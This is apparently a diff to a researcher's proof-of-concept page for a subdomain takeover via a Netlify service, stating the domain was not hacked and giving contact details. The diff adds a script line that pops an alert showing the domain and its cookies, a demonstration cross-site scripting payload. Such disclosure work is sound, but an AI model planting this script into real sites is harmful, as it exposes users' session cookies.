--- a/index.html
+++ b/index.html
@@ -1,3 +1,4 @@
 <h1>SIMPLE domain takeover PoC</h1>
 <b>This domain was not hacked, this is a PoC for subdomain takeover via netlify service</b>
 <p>please contact 4lemon.ru or averonesis.at.gmail.com</p>
+<script>alert('this is a XSS on ' + document.domain + ' ' + document.cookie);</script>
